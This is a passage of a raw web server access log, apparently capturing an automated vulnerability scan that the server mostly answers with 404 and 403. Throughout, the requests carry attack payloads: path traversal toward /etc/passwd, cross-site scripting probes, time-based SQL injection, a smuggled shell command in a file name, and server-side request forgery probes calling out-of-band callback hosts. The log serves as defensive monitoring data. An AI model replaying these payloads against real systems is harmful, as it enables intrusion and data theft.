Chrome/41.0.2225.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /admin/login/index.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.55" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:56.0) Gecko/20100101 Firefox/56.0" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.37" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /ExportReportingManager.aspx HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.1.2 Safari/601.3.9" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /?paytm_action=curltest&url=ct4hu7d65jrdcfcsg3401ajqhdgpig9dk.oast.site HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /?lang=../../thinkphp/base HTTP/1.1" 403 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /index.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "POST /SamlResponseServlet HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /shib_logout.php?action=logout&return=https://oast.me HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /?phonepe_action=curltestPhonePe&url=http://ct4hu7d65jrdcfcsg340xf76nmqs7b74p.oast.site HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /badging/badge_template_v0.php?layout=1&type=\x22/> HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527+ (KHTML, like Gecko) Version/3.1.1 Safari/525.20" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /api/v2.0/search?q=/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /login.php?secret=\x22> HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /api/scrape/kube-system HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "POST /classes/Login.php?f=login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; U; Linux x86_64; rv:109.0) Gecko/20001919 Firefox/109.0" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /fp-content/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /accounts/login/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /functions/scripts/find_full_subnets.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "POST /goanywhere/lic/accept HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /flatpress/fp-content/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /web/set_profiling?profile=0&collectors= HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15242.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "POST /search-request.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "POST /banker/index.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.3) Gecko/20060522 Firefox/1.5.0.3" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /wp-admin?piereg_logout_url=true&redirect_to=https://oast.me HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.2" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /flash/addcrypted2 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 15242.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.11" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /admin/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /ilias/shib_logout.php?action=logout&return=https://oast.me HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "GET /images//////////////////../../../../../../../../etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "POST /search-locker-details.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35" 172.18.0.4 - - [29/Nov/2024:09:56:45 +0800] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 OS/10.0.22621" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /jeecg-boot/jmreport/qurestSql HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML: like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /flash/addcrypted2 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /csrf HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.43" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /index.php?c=blocked&action=continue HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt= HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/117.0" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.2210.157" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.44" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /setup/setupadministrator-start.action HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /api/v1/clusters/kubeconfig/k8s HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.39" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /index.html HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:58.0) Gecko/20100101 Firefox/58.0" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /saas./resttosaasservlet HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /kubepi/api/v1/users HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0 Time/1700917320335" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /template/aui/text-inline.vm HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.4.27" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "POST /json/setup-restore.action HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:46 +0800] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2pVJVukvi48tKencdV5NO3rndK6 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.62" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.10" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /login.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /%255c%255cct4hu7d65jrdcfcsg340xytxh9bq6wxef.oast.site%255cC$%255cbb HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /wp-admin/admin-ajax.php?action=lwp_forgot_password&ID= HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1" 403 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 whid/mtn1 macaddress/64c901fe4da7" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /?url= HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /jsps/genrequest.jsp?routineName=\x22> HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /setup/setupadministrator-start.action HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.9" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /downloader.php?file=%3Becho+CVE-2023-23333|rev%00.zip HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "POST /spcgi.cgi HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:56.0) Gecko/20100101 Firefox/56.0" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /index.html HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.34" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "POST /setup/setupadministrator.action HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "POST /dologin.action HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "POST /api/2.0/mlflow/model-versions/create HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/9.1.2 Safari/603.1.30" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /welcome.action HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 5.1; rv:58.0) Gecko/20100101 Firefox/58.0" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /pmb/opac_css/pmb.php?url=https://oast.me&hash=9c4438eb62929d9b535fb6fe98223c5e HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.39" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 172.18.0.4 - - 